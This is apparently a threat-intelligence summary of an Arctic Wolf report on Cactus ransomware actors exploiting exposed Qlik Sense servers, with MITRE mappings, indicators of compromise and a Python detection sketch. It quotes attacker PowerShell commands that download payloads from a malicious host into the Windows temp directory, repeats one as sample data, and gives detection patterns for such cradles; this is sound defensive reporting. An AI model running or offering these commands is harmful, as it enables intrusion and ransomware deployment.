Qlik Sense Exploited in Cactus Ransomware Campaign – Arctic Wolf

Arctic Wolf Labs reports a new Cactus ransomware campaign that exploits publicly exposed Qlik Sense installations to gain initial access, followed by deployment of the ransomware. The operation abuses the Qlik Sense Scheduler service to drop remote-access tools (ManageEngine UEMS, AnyDesk, Plink), uses PowerShell and BITS for payload delivery, and relies on RDP, WizTree, and rclone for lateral movement, discovery, and exfiltration.

Keypoints

  • Exploitation of Qlik Sense installations to gain initial access and deploy Cactus ransomware.
  • Exploited CVE-2023-41266, CVE-2023-41265, or potentially CVE-2023-48365 to achieve code execution.
  • The Scheduler service (Scheduler.exe) is central to the intrusion, spawning uncommon processes and enabling further actions.
  • PowerShell and the Background Intelligent Transfer Service (BITS) are used to download tools and establish persistence/remote control.
  • Tools downloaded/used include ManageEngine UEMS (renamed), AnyDesk, and PuTTY Link (Plink).
  • Remote access and lateral movement involve RDP, SSH tunnels via Plink, and related credential/configuration steps.
  • Discovery and exfiltration steps involve WizTree for disk insight and rclone for data exfiltration.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The threat actors exploited Qlik Sense installations to achieve code execution. “Based on patch level Qlik Sense is likely being exploited either via the combination or direct abuse of CVE-2023-41266, CVE-2023-41265 or potentially CVE-2023-48365 to achieve code execution.”
  • [T1059.001] PowerShell – The intrusion uses PowerShell to download and execute payloads, e.g., “powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:\windows\temp\putty.exe” and related commands.
  • [T1197] BITS Jobs – The attackers leveraged Background Intelligent Transfer Service (BITS) to download additional tools, e.g., “powershell start-bitstransfer -source http://zohoservice[.]net/qlik-sens-nov.zip -outfile c:\windows\temp\Qliksens.exe”
  • [T1036] Masquerading – Renamed ManageEngine UEMS executables, with a ZIP extension masquerading as Qlik files.
  • [T1218.009] Signed Binary Proxy Execution – Msiexec – “MsiExec.exe /X{…} /qn” used to uninstall Sophos as part of the activity.
  • [T1021.001] Remote Services – RDP – Used for lateral movement within networks.
  • [T1021.004] Remote Services – SSH – Plink was used to establish an SSH tunnel for remote access.
  • [T1219] Remote Access Software – AnyDesk was downloaded and used for remote control.
  • [T1083] File and Directory Discovery – WizTree was downloaded to assess disk space and files for discovery.
  • [T1041] Exfiltration Over C2 Channel – rclone was used (renamed as svchost.exe) to exfiltrate data.
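The behaviours above (Scheduler.exe spawning PowerShell, iwr / start-bitstransfer fetching archives into a world-writable temp directory) give defenders a compact detection opportunity. The following is an added example, not code from Arctic Wolf or Qlik: it scores constructed Sysmon-style process-creation events; the Qlik install path and the benign Engine.exe child are assumptions, and the sample command lines are taken from the report.

```python
"""Detection sketch for the Qlik Sense Scheduler abuse described above.

Events below are constructed, not real telemetry. The idea: Scheduler.exe
is expected to spawn Qlik's own worker binaries, not PowerShell pulling
archives from the internet into the Windows temp directory.
"""
import re

# Child images that are not expected under Qlik's Scheduler service.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "msiexec.exe"}
# Download primitives seen in the campaign (iwr = Invoke-WebRequest alias).
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|start-bitstransfer)\b.*https?://", re.I)
# Drop locations used in the campaign (regex escapes: one literal backslash each).
TEMP_DROP_RE = re.compile(r"(c:\\windows\\temp\\|c:\\users\\public\\)", re.I)

# Constructed sample events; Qlik paths are assumed, command lines are from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:\windows\temp\putty.exe"},
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Program Files\Qlik\Sense\Engine\Engine.exe",   # assumed benign child
     "CommandLine": r"Engine.exe --worker"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-Process"},
]


def score_event(ev):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    reasons = []
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    if parent == "scheduler.exe" and child in SUSPICIOUS_CHILDREN:
        reasons.append("scheduler-spawned-" + child)
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download-cradle")
    if TEMP_DROP_RE.search(cmd):
        reasons.append("drop-to-writable-temp")
    return reasons


def detect(events):
    """Return (index, reasons) for every event that triggered at least one reason."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], why)
```

The parent/child pairing alone is the high-signal part; the download-cradle and temp-drop checks widen coverage to the same tooling launched from other parents.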

Indicators of Compromise

  • [IOC Type] IP Address – 45.61.147[.]176 (ManageEngine Server / IP for zohoservice[.]net); 216.107.136[.]46 (ManageEngine Server hosting payload over HTTP); 144.172.122[.]30 (ManageEngine Server hosting payload over HTTP)
  • [IOC Type] Domain Name – zohoservice[.]net (Hosting payload over HTTP)
  • [IOC Type] URL – http://zohoservice[.]net/putty.zip; http://216.107.136[.]46/Qliksens_update.zip; http://216.107.136[.]46/Qliksens_updated.zip; http://zohoservice[.]net/qlik-sens-Patch.zip; http://zohoservice[.]net/qlik-sens-nov.zip
  • [IOC Type] File path – C:\Users\Public\svchost.exe; c:\windows\temp\Qliksens.exe; c:\windows\temp\any.exe; C:\Windows\appcompat\AcRes.exe
  • [IOC Type] Filename – Qliksens.exe; Qliksens_updated.zip; Qliksens_update.zip; Qlik_sense_enterprise.zip; anydesk.zip; putty.exe
  • [IOC Type] SHA256 – 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d; 90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82; 3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d; 6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96
  • [IOC Type] URL – https://download.anydesk.com/AnyDesk.exe (Official AnyDesk Installer)

Read more: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/